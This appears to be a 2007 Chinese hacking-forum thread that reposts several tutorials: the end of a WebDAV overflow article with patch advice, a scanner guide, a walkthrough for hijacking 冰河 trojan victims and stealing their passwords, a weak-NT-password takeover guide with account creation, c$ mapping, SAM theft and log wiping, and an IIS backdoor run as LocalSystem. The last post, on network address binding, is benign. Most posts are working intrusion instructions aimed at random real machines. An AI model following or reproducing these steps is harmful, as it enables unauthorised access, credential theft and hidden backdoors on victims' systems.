命令成功了,看来System权限是真的了,那不是可在机器上干任何事情了?还真有点可怕!好了,我们这里只是测试,到此就停止吧!
三、 漏洞消除方案
我们上面已经看到了WebDAV远程溢出攻击的威力了吧,而到本文截稿为止,国内网络上的WebDAV远
程溢出攻击是越来越多了,你的IIS服务器一不小心就有可能被黑客攻击而成为被控制的傀儡,所以管理员和用户们千万不能大意,一定要尽快地堵上这个漏洞,千万不能再重演像MSSQL的远程溢出漏洞那样的惨痛教训了。具体的可以通过以下几个方案来解决:
⑴ 安装补丁,目前微软已经提供了此漏洞的补丁,下载地址http://microsoft.com/downloads/
details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
或者,你也可以作用微软提供的IIS Lockdown工具来防止该漏洞被利用。
⑵ 如果你不能立刻安装补丁或升级,也可以手工修补这个漏洞,我们上面已经说了WebDAV功能对一般的Web服务器来说并不需要,所以可以把它停止掉。WebDAV在IIS 5.0 WEB服务器上的实现是由Httpext.dll完成,默认安装,但是简单更改Httpext.ell不能修正此漏洞,因为WINDOWS 2000的WFP功能会防止系统重要文件破坏或删除。要完全关闭WebDAV包括的PUT和DELETE请求,需要对注册表进行如下更改:
启动注册表编辑器,搜索注册表中的如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
找到后点击"编辑"菜单,点击"增加值",然后增加如下注册表键值:
value name: DisableWebDAV
Data typeWORD
value data: 1
最后别忘了重新启动IIS,只有重启IIS后新的设置才会生效
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 70楼  发表于: 2007-11-16 0
流光的使用方法


窍门一:

1.很多人都有使用流光4.71之前版本的经验,不过现在请下载流光5.0内部测试版.地址:

http://www.netXeyes.com 安全焦点

http://www.swed.com.tw/xiaonu/f.rar 小奴私人下载

下载后解压安装! 解压密码在说明文件里..
(强烈建议查看readme文档再安装撒...)

安装后打上时间补丁...请把补丁放在同一个文件夹里.

2.如果没有安装时间补丁一打开流光就会出现:"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"

3.如果安装了时间补丁,你可以打开5.0.但是还是会出现"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"...这时我们就要用到特别的方法来防止流光5.0过期了...

4.(仔细..再仔细)如果你有金山网标或者天网之类的防火墙的话...恭喜你.你就快成功了..小榕设计流光5.0内部测试版的时候会让打开主程序就会自动访问四个IP地址.
第一个是61.166.33.214 -- 云南省 楚雄市
第二个是218.30.12.185 -- 陕西省 西安市 (可能会变)
第三个是61.166.33.214 (跟第一个一样)
第四个是66.94.230.45 -- 美国(可能会变..这个很"阴险"大概在前面三个IP过后20秒左右它才出现)

防火墙首先禁止前面四个IP连接.(直接点击禁止就可以了)...

四个IP过后随便你扫什么都不会有限制.如果这时防火墙询问你是不是允许流光5.0访问**.**.**.**(ip)?? 当然点击允许啦...要不怎么扫??

4.流光5.0增强了SENSOR的扫描属性.很强大...特别是"TELNET ip 控制端口"和数据包转发功能我佩服得7体投地...自带有说明文件.大家看看就知道了.(我在这里就不废话了撒...呼呼)
_________________________________


窍门二:

还有一个比较"失败"的方法.打开补了丁的流光之前首先关闭网络连接,即不要上网.过1分钟以后再打开网络连接...这时你就可以无忧用5.0了..(这样做是防止一开流光5.0就访问指定IP)
_________________________________

窍门三:

听"新丁"(我在黑基的兄弟)说更改流光的图标也可以防止过期提示,我没试过.大家试试..
_________________________________

TNND...酒气冲头.难受死了...坚持搞完..
_________________________________

友情提醒:

1.如果你是天网防火墙请把"属性设置"--"自动允许每个程序运行并记录日志"(好像是这样吧)的勾去掉...这样就可以拦截流光运行时访问的IP地址了..

2.流光5.0由于是内部测试版本,所以不限制国内IP扫描.请千万不要!不要!!不要!!!扫国内IP!尽量多种植SENSOR到你的外国肉鸡上帮你扫撒....(呼呼,我最喜欢做的事)

3.流光5.0太强大.扫描的IP段尽可能少点...这个版本中包含了工具ARP Netwok Sniffer,这是一个基于ARP SPOOF的工具,有可能会造成目标网络出现故障甚至于中断,在使用的时候不要指定过于大的IP范围。推荐不要超过32台主机。--- 引用

不要把自己的机子都搞死了!同时尽量不要使用"网络嗅探"功能. "要知道在一个100M的环境中的流量是非常大的,所以请首先确定您自己的主机是否有足够的带宽接收传输数据" --- 引用!

___________________________________

某些醉话...

1.很多人扫描的时候会扫到用户:root:空 admin:同 administrator:同 wwwadmin:同 等同时存在于一个IP的现象.但是建立IPC连接的时候却失败.

注意:这些是虚报...请你点击"选项(o)"---"IPC用户列表选项(I)"----把"如果主机不允许列出用户则强制从以下文件导入"的选项去掉...这样你扫描出来的用户就不会虚报了...

2.扫描的时候要注意时间...要想到国外的时间跟我们有差异...如果你特别喜欢在我们的下午4点扫美国的IP段...那我没话可说!

3.不要扫描自己不会利用的漏洞和端口...反正自己不会用,扫又浪费时间...(如果你打算学习怎么利用...那鼓励你扫!)

4.流光的综合性很强!注意看每一项选项内容,自己摸索更好的综合扫描办法,....

玩木马


如果你是高手,看了这篇文章你会觉得无聊,如果你是菜鸟(和我一样菜的话)或者会有点用。哪个人不爱玩?给我站出来!我要狠狠的KKKKK他一顿。5555.........好了,闲话少说为好,转入正题吧。首先我用到的工具主要是两个,1.扫描工具:*****猎手,2.冰河2.2客户端。(哪里有下载?自己找吧)下面分两步走:
一.扫描篇:
双击桌面上的*****猎手快捷图标,进入*****猎手主操作台.点击左上角三角形下面的“搜索任务”,点击下面的“添加任务”,进入“添加搜索任务”窗口,任务类型选“搜索网址范围”,按“下一步”,进入地址范围窗口,接着按右边的“添加”,在弹出的窗口中,地址范围类型选“起止地址范围”,起止地址填上你要扫描的IP段(例如61.150.0.0)结束地址填上例如(61.150.255.255),按“确定”,见到我刚才填的IP段出现在窗口中。接着按“下一步”,进入端口和协议窗口,按右边的“添加”,在弹出的小窗口中选“单一端口”,下面数字框中填上冰河的默认端口7626协议选“HTTP”,在旁边的“必搜”前打上钩。按“确定”,就看到了我刚才填的端口和协议出现在窗口中,按“完成”,这时回到添加前的窗口。看到框框中已有了我刚才填的内容 ,左上角的三角形也由开始的灰色变了现在的蓝色,这时按下这个三角形就开始了我的第一次搜索任务(这时操作台下面的数字会不停的跳动,表示正搜索中),这时按下红色停止按钮下面的“搜索结果”按钮,就看到了搜索的结果,如果有端口7626开的机器扫到,就会在窗口中显示该机的IP地址,(验证超时那些先不要理它,反正它的端口7626是打开了),如果你选IP段好运的话,很快就会有机器被你扫描到!你不仿等到扫描到的机器有多几个时才停止扫描,这样你进别人的机器跳舞的机会就大大提高了!如果你真的那么倒霉扫不到的话,就换IP段来搜吧.不过要记住把先前的搜索任务删除掉再添加新的搜这里有一点要告诉你,*****猎手的其他设置你先不要搞(其余都是默认的),就按我上面提到的做就行了!好了,扫描到了一大堆的IP了,GO GO GO 进入主要的一步了。。。。。

二。连接篇:
运行冰河2.2客户端,进入操作台,点击左上角"添加主机"按钮,在弹出的窗口中,显示名称处填上我刚才扫描到的IP,密码先不填,端口填默认的7626.按"确定",这时看到了填入的IP出现在主操作台左边的窗口中了.重复上面的这一步,把扫描到的IP全部都填进去(省去了等一下连接一个填一次的麻烦),看到了所有的IP都填进去后,就开始了我们的第一次入侵(这里有一点要提醒一下的是,你在连接前一定要把你的防火墙和病毒监控关了).好了,双击操作台左边看到的IP,下面的状态条会滚动,等待一下,看看返回来什么信息.如果是"主机没有响应"或者"无法与主机连接",试多几次,还是一样的话,可能对方已离线或打开7626端口的不是冰河的服务端,就选下一个IP.好了,这个能连接,但返回的信息是"口令有误..."那这个我可以搞店了,先试冰河的通用密码,具体操作如下:右键点击该IP,在弹出菜单中选"修改",进入刚才添加IP的窗口,在"访问口令"处填上你所选的通用密码,按"确定".再到主操作台上"当前连接"的下拉菜单中找到你刚才修改了口令的IP,点击一下,看到"访问口令"处出现了多个"*******"号,这就是你填上的冰河通用密码了,再按一下旁边的"应用",再双击操作台左边该IP,就尝试再次连接,当看到"正在接收数据""完成"等字样时,呵呵,你已成功了.这部机你有了一切的操纵权了.看到了他的机器的分盘(C.D.E.F.G.等)在右边的屏幕中出现了,双击这个小图标,你就可以看到他的硬盘中的文件夹列表和文件,再通过用鼠标右键点击文件夹或文件,你就可以使用"复制","粘贴",删除","下载"等等功能了,你也可以上传一个文件给他远程打开,呵呵.如果你上传的是另一个木马,那他的机就又多中了一个马儿了..具体做什么自己想吧.去看看他在干什么吧,点击操作台上方"查看屏幕"按钮,图象格式处选"JPEG",(因为JPEG图象传输速度比BMP的传输速度要快),按确定,等一下一个小的屏幕就出来啦,这个就是对方的屏幕画面了,右键点击该小屏幕,在"自动跟踪"和"自动缩放"前打上钩,那么这个小屏幕就会跟随对方的屏幕变化而变化了.再去点击"命令控制台",看到各个命令类按钮,双击各个按钮会有不同的命令出了,你可以在"口令类命令"下的"历史口令"处查看他的QQ密码,上网密码等等,在"设置类命令"下的"服务器配置"中读取该冰河服务端的配置信息,也就是刚才阻档你连接的设置了的密码,要是对方有设置IP邮寄的话你也可以看到他的信箱号,用这个密码你或许能破了他的信箱(我用这个方法也真的破了好几个人的信箱哦,呵呵),你也可以修改了他的配置,换了你自己的密码和邮寄信箱.你也可以帮他的硬盘创建共享.以后他把冰河杀了你也可以用共享连接他啊!(等于给自己多留了个后门)其他功能就不说了,你自己慢慢去尝试吧!
还有一种情况,就是你尝试了所有的通用密码都不能连接的话,就试试小飞刀原创的冰河漏洞吧,具体操作如下:当你用完了通用密码后还是显示"密码有误......",就去点击操作台窗口中的"我的电脑",在你的文件中找到你的冰河服务端,右键点选"远程打开",这时你依然看到是"密码有误....",但马上又多了一条传输进度条出来,显示正在传送文件,当看到了进度条完成后,下面的提示也变了,会显示"文件传送完毕"和"文件打开成功".这样你就可以不用密码连接进去了.(记住要先把你刚才填进去的密码删了,按"应用".当返回的信息是"文件传送完毕"和"文件打开失败"时,你可以上传其他的木马服务端(例如黑洞,公牛等等木马都可以)上去,这样也可以控制对方,但已不是用冰河客户端了,而是换了相对应的木马客户端.
咳咳........进去后可别干坏事哦!

其实玩了这么多的木马还是觉得冰河是再好用的(呵呵.这只是个人观点,你有好用的木马就告诉我一声吧),功能多多,易用,而且中冰河的机器也是再多的.其他功能就不一一说了..(呵呵呵.堂主水平有限,看了可别笑掉牙,我可没钱给你补牙)
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 69楼  发表于: 2007-11-16 0
入门者如何获得肉鸡


入门者如何获取肉鸡(跳板)

入门者如何获取肉鸡(跳板)
今天我们来讲一讲一些简单的入侵,这篇文章是送给新手的,难的文章我也写不出来~~ 这里讲的方法都是针对winnt和2000的,平台是2000。我只是想送给新手点肉鸡罢了。

罗嗦了这么多,现在我们开始吧~。首先我们来对几个扫描器评点一下什么?你不知道扫描器是什么?我晕~~~扫描器就是扫描的嘛,它可以检测出主机的漏洞!
常见的有端口扫描器,和cgi漏洞扫描器,还有就是象流光那样的大型扫描器,什么都可以扫。我们先来讲一下扫描器的原理!
现在假设你是A,要扫的是B
那么,通常建立3次握手的过程是
A--------Syn------->B
A<-----Syn/Ack------B
A-------Ack-------->B
这样就建立了连接,扫描就是建立很多这样的,从而达到了解对方开了哪些端口,哪些服务厉害的扫描器还会进一步探测!但是,这种tcp扫描会留下大量的记录,如果B的网管不是注意文明用语那么他就会开始注意你了!!
所以我们又会用半开放式扫描(syn)
也就是
A--------Syn------->B
A<-----Syn/Ack------B
A------->\\ B
A-connected--?<-----B
这样,由于B一直得不到确认,当然就不会记录ip啦,不过B若是很bt,那么他也会记录任何syn的 ip,那就没办法了!!

扫描的原理讲完了,现在来讲讲几个扫描的工具!!这才是重点,新手哪会关心

那原理啊~~~ 我们先来讲端口扫描器一个端口就是一条路,进入系统的的路!可见他的重要!!
我推荐用superscan和nscan两个都是国外的,superscan的汉化版有问题,建议去www,peckerland.com下载E文版
nscan在黑白有下! 这两个的界面简单,我就不罗嗦了!我很喜欢superscan.他的扫描准且快~~对单一端口的大规模扫描也很不错,以前大家就是用它来扫3389的!

下面我来介绍流光!!xscan!!和sss!!! 我想大家对流光应该不陌生吧!如果你是新手,先从流光开始!!界面很cool!多亏榕哥~~不过我宁可把流光作为一个攻击的工具而不是扫描的工具xscan则是安全焦点的,他可以半开放式扫描!!
而且在扫描上我觉得比流光好!因为我问过sharkstorm,他说流光会在对方主机上留下痕迹,所以我怀疑流光用的是tcp扫描! 所以我现在用大规模扫描时是用xscan而不是流光! 接下来是sss,现在的最新版是3.43,在www.peckerland.com上有3.41版和注册机.
他是由redshadow开发的,全称shadow security scanner他能扫描很多漏洞,速度也很快,留下的痕迹少,产生报告详细.有时候流光或是国内一些扫描器会误报,这时我常用他来检测.所以,在入侵单一机器时,我用的就是它!!!!
好累啊,先喝口茶~~~下面就讲怎样获得大量肉鸡! 这里我推荐用扫描nt弱口令的方法! 当然也许别人会推荐扫描sql的弱口令,但网上的nt弱口令真的比sa为空的要多太多了~~ 我们先打开流光4->扫描->简单扫描->nt/98->IP段开始扫,扫到很多139开了的主机然后ipc主机,右键->探测->远程探测用户然后就会有很多用户和共享被扫出来,其中有可能包括弱口令(参见杀手的流光教程)这里我告诉大家一个秘诀,就是有很多是guest为admin权限的,这些的密码一般为空这是因为这台主机被攻破过,有人留下了后门,这下便宜我们了,先拿来用了再说!
前面我们说过,我不喜欢用流光来扫描,所以,我们在这里用xscan来扫描nt弱口令! 在扫描选项里选nt弱口令,然后来个ip范围,让他扫,接下来就可以等待战果了一般会很丰硕,我每次扫这个都很爽!!! 接下来就要讲怎么用了!前面提到过我喜欢用流光来攻击,现在就让我们看看他的强大!! 流光4->工具->nt/iis工具->nt远程管道命令输入ip,刚才扫到的用户名,密码(若为空则不填) 连接!
ntcmd>net user
看看,连上了吧~~
我们来添加一个用户名
ntcmd>net user aaa 123 /add
命令成功完成

加到administrators组
ntcmd>net localgroup administrators aaa /add
命令成功完成

好了,这样肉鸡就做好了.什么?你想把他作成跳板? 好的,我们继续来
流光4->工具->nt/iis工具->ipc种植者
添上ip,用户名,密码等
然后点开始
接下来我们再用telnet连上去,去debug snake的sksockserver注意,用ntcmd

不能安装sksockserver。
具体我就不说了,大家自己参考说明.

当然,大家也可以放一堆后门上去.
不过我喜欢这样
ntcmd>net use g: \\ip\c$
命令成功完成

这样,我们就把他的c盘映射成了我的g盘。然后我再放个木马的server上去再用ntcmd运行,呵呵搞定~~,玩他没商量!!!
我们还可以把c;\winnt\repair\sam._抓下来,用lc3跑一下 就得到所有用户的密码,或是用木马抓密码!!
当然我们也可以telnet上去运行tlntadmn来修改telnet端口,更隐蔽怎么扩大战果呢?我们仍用ntcmd
ntcmd>net view
......
出来很多机器名,这是和我们的肉鸡共享的
比如有一台是
\\LOVE
我们就
ntcmd>ping -a LOVE
这样就得到了他的ip
我一般会用sss再扫一次
当然,你也可以用你得到的密码去试试,看能不能进去,呵呵

有一次,我"不小心"跑到某教育部门,net view一下,居然和教育局挂钩....接下来出于自身安全,我就停住了,呵呵,中国的政府不能乱搞的~~~

最后是打扫脚印,建议用小榕的cleaniislog,很方便,用法参见说明! 请记住,入侵nt的首选绝对是139,netbios

补充一点,大家在连接时可以用2000自带的计算机管理->连接到计算机这样也很方便.

关于其他几种方法,我在这里说明一下

输入法基本上绝种了~~ 不过如果你扫大量的肉鸡也许还有最好用的应该数sql的sa为空,直接用流光连就行了,连上后就可以直接添加帐号等,但是有一点不好有时候会连不上。比如我在学校机房就从来没连上过,估计是我在内部网络,有硬防火墙的原因,我在3389上就连的很好。不过总是玩这个是不会提高的!其次要说明的就是idq溢出与.printer的漏洞,这两个漏洞我不想多说什么,因为很多人都会用但成功不了,我在这里就说说什么情况下可以成功。一般来说,用xscan扫描,如果出现说isapi扩展,那么恭喜你,如果存在这两个漏洞绝对成功,我屡试不爽。因为这两个漏洞都与iis那个破东西息息相关,所以大家不要被别的扫描器的误报迷惑,在安焦的漏洞库有这两个漏洞的详细说明。

关于unicode漏洞请参见ncc写的教程

流光是一个很好的攻击工具,他的exploits文件夹和tools文件夹的东西大家漫漫体会,呵呵。不说了,不然天下大乱了!!

总之,98的安全性比2000好,因为98基本上没用 一般来说,入侵98是从139,要改自己的lmhosts文件来达到入侵的目的! 不过我劝新手不要沉迷在我讲的方法中,虽然你能从中的到很多肉鸡,但是绝对不要做简单重复的工作 当有了一定水平后要去玩linux,unix,不然水平不会提高. 我写这篇文章的目的是让大家学习,请不要破坏,若是因此引起的一切后果本人概不负责!!
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 68楼  发表于: 2007-11-16 0
永远的后门

IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。


如果你对此有情趣,跟我来...........
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
Accessscript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemotescript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
不要告诉我你不知道上面的输出是什么!!!!
现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了

3. mkdir c:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"
这样就建好了一个虚目录:Virtual Dir1
你可以用 1 的命令看一下
5. 接下来要改变一下Virtual Dir1的属性为execute
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false


注释:cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path


这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)

大家不可以用来做非法的攻击,一切后果自负
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 67楼  发表于: 2007-11-16 0
浅谈绑定之应用


目前以太网已经普遍应用于运营领域,如小区接入、校园网等等。但由于以太网本身的开放性、共享性和弱管理性,采用以太网接入在用户管理和安全管理上必然存在诸多隐患。业界厂商都在寻找相应的解决方案以适应市场需求,绑定是目前普遍宣传和被应用的功能,如常见的端口绑定、MAC绑定、IP绑定、动态绑定、静态绑定等。其根本目的是要实现用户的唯一性确定,从而实现对以太网用户的管理。

  一、绑定的由来

  绑定的英文词是BINDING,其含义是将两个或多个实体强制性的关联在一起。一个大家比较熟悉的例子,就是配置网卡时,将网络协议与网卡驱动绑定在一起。其实在接入认证时,匹配用户名和密码,也是一种绑定,只有用户名存在并且密码匹配成功,才认为是合法用户。在这里,用户名已经可以唯一标识某个用户,与对应密码进行一一绑定。

  二、绑定的分类

  从绑定的实现机制上,可以分为AAA(服务器)有关绑定和AAA无关绑定;从绑定的时机上,可以分为静态绑定和动态绑定。

  AAA是用户信息数据库,所以AAA有关绑定以用户信息为核心,认证时设备上传绑定的相关属性(端口、VLAN、MAC、IP等),AAA收到后与本地保存的用户信息匹配,匹配成功则允许用户上网,否则拒绝上网请求。

  AAA无关绑定完全由接入设备实现。接入设备(如Lanswitch)上没有用户信息,所以AAA无关绑定只能以端口为核心,在端口上可以配置本端口可以接入的MAC(或IP)地址列表,只有其MAC地址属于此列表中的计算机才能够从该端口接入网络。

  静态绑定是在用户接入网络前静态配置绑定的相关信息,用户接入认证时,匹配这些信息,只有匹配成功才能接入。

  动态绑定的相关信息不是静态配置的,而是接入时才动态保存到接入设备上,接入网络后不允许用户再修改这些信息,一旦修改,则强制用户下线。

  AAA相关绑定一般都是静态绑定,动态绑定一般都是在接入设备上实现的。接入设备离最终用户最近,用户所有的认证数据流和业务数据流都必须经过接入设备,只有认证数据流经过AAA,所以接入设备可以最容易最及时发现相关绑定信息的变化,也方便采取强制用户下线等处理措施。另外,网络中AAA一般只有一台,集中管理,接入设备却有很多,由分散的接入设备监视用户绑定信息的变化,可以减轻AAA的负担。

  三、绑定的应用模式

  除了常用的用户名与密码绑定外,可以用于绑定的属性主要有:端口、VLAN、MAC地址和IP地址。这些属性的特性不同,其绑定的应用模式也有较大差别。

  1、IP地址绑定

  1)解释

  按照前边的定义标准,IP地址绑定可以分为AAA有关IP地址绑定、AAA无关IP地址绑定、IP地址静态绑定和IP地址动态绑定。

  AAA有关IP地址绑定:在AAA上保存用户固定分配的IP地址,用户认证时,接入设备上传用户机器静态配置的IP地址,AAA将设备上传IP地址与本地保存IP地址比较,只有相等才允许接入。

  AAA无关IP地址绑定:在接入设备上配置某个端口只能允许哪些IP地址接入,一个端口可以对应一个IP地址,也可以对应多个,用户访问网络时,只有源IP地址在允许的范围内,才可以接入。

  IP地址静态绑定:接入网络时检查用户的IP地址是否合法。

  IP地址动态绑定:用户上网过程中,如更改了自己的IP地址,接入设备能够获取到,并禁止用户继续上网






2)应用

  教育网中,学生经常改变自己的IP地址,学校里IP地址冲突的问题比较严重,各学校网络中心承受的压力很大,迫切需要限制学生不能随便更改IP地址。可以采用以下方法做到用户名和IP地址的一一对应,解决IP地址问题。

  如有DHCP Server,可以使用IP地址动态绑定,限制用户上网过程中更改IP地址。此时需要接入设备限制用户只能通过DHCP获取IP地址,静态配置的IP地址无效。如没有DHCP Server,可以使用AAA有关IP地址绑定和IP地址动态绑定相结合方式,限制用户只能使用固定IP地址接入,接入后不允许用户再修改IP地址。通过DHCP Server分配IP地址时,一般都可以为某个MAC地址分配固定的IP地址,再与AAA有关MAC地址绑定配合,变相的做到了用户和IP地址的一一对应。

  2、MAC地址绑定

  1)解释

  与IP地址绑定类似,MAC地址绑定也可以分为AAA有关MAC地址绑定和AAA无关MAC地址绑定;MAC地址静态绑定和MAC地址动态绑定。

  由于修改了MAC地址之后,必须重新启动网卡才能有效,重新启动网卡就意味着重新认证,所以MAC地址动态绑定意义不大。

  2)应用

  AAA有关MAC地址绑定在政务网或园区网中应用比较多,将用户名与机器网卡的MAC地址绑定起来,限制用户只能在固定的机器上上网,主要是为了安全和防止帐号盗用。但由于MAC地址也是可以修改的,所以这个方法还存在一些漏洞的。

  3、端口绑定

  1)解释

  端口的相关信息包含接入设备的IP地址和端口号。

  设备IP和端口号对最终用户都是不可见的,最终用户也无法修改端口信息,用户更换端口后,一般都需要重新认证,所以端口动态绑定的意义不大。由于AAA无关绑定是以端口为核心了,所以AAA无关端口绑定也没有意义。

  有意义的端口绑定主要是AAA有关端口绑定和端口静态绑定。

  2)应用

  AAA有关端口绑定主要用于政务网、园区网和运营商网络,从而限制用户只能在特定的端口上接入。

  4、VLAN绑定

  1)解释

  与端口绑定类似,VLAN相关信息也配置在接入设备上,最终用户无法修改,所以,VLAN动态绑定意义不大。对于AAA无关VLAN绑定,如只将端口与VLAN ID绑定在一起,那么如果用户自己连一个HUB,就会出现一旦此HUB上的一个用户认证通过,其他用户也可以上网的情况,造成网络接入不可控,所以一般不会单独使用AAA无关的VLAN绑定。

  常用的VLAN绑定是AAA有关VLAN绑定和VLAN静态绑定。





 2)应用

  如网络接入采用二层结构,上层是三层交换机,下层是二层交换机,认证点在三层交换机上,这种情况下,仅靠端口绑定只能限制用户所属的三层交换机端口,限制范围太大,无法限制用户所属的二层交换机端口。

  使用AAA有关VLAN绑定和VLAN静态绑定就可以解决这个问题。

  分别为二层交换机的每个下行端口各自设置不同的VLAN ID,二层交换机上行端口设置为VLAN透传,就产生了一个三层交换机端口对应多个VLAN ID的情况,每个VLAN ID对应一个二层交换机的端口。用户认证时,三层交换机将VLAN信息上传到AAA,AAA与预先设置的信息匹配,根据匹配成功与否决定是否允许用户接入。

  此外,用户认证时,可以由AAA将用户所属的VLAN ID随认证响应报文下发到接入设备,这是另外一个角度的功能。虽然无法限制用户只能通过特定的二层交换机端口上网,但是可以限制用户无论从那个端口接入,使用的都是用一个VLAN ID。这样做的意义在于,一般的DHCP Server都可以根据VLAN划分地址池,用户无论在哪个位置上网,都会从相同的地址池中分配IP地址。出口路由器上可以根据源IP地址制定相应的访问权限。综合所有这些,变相的实现了在出口路由器上根据用户名制定访问权限的功能。

  5、其它说明

  标准的802.1x认证,只能控制接入端口的打开和关闭,如某个端口下挂了一个HUB,则只要HUB上有一个用户认证通过,该端口就处于打开状态,此HUB下的其他用户也都可以上网。为了解决这个问题,出现了基于MAC地址的认证,某个用户认证通过后,接入设备就将此用户的MAC地址记录下来,接入设备只允许所记录MAC地址发送的报文通过,其它MAC地址的报文一律拒绝。

  为了提高安全性,接入设备除了记录用户的MAC地址外,还记录了用户的IP地址、VLAN ID等,收到的报文中,只要MAC地址、IP地址和VLAN ID任何一个与接入设备上保存的信息匹配不上,就不允许此报文通过。有的场合,也将这种方式称为接入设备的“MAC地址+IP地址+VLAN ID”绑定功能。功能上与前边的AAA无关的动态绑定比较类似,只是用途和目的不同。

  四、业界厂商产品对绑定的支持

  以上的常用绑定功能业界厂商都普遍支持,一些厂商还进行了更有特色的功能开发,如华为提供的以下增强功能:

  1、绑定信息自学习

  1)MAC地址自动学习

  配置AAA相关MAC地址绑定功能时,MAC很长,难以记忆,输入时也经常出错,一旦MAC地址输入错误,就会造成用户无法上网,大大增加了AAA系统管理员的工作量。CAMS实现了MAC地址自动学习功能,可以学习用户第一次上网的MAC地址,并自动与用户绑定,既减少了工作量,又不会出错。以后用户MAC地址变更时,系统管理员将用户绑定的MAC地址清空,CAMS会再次自动学习用户MAC地址。

  2)IP地址自动学习

  与MAC地址自动学习类似。

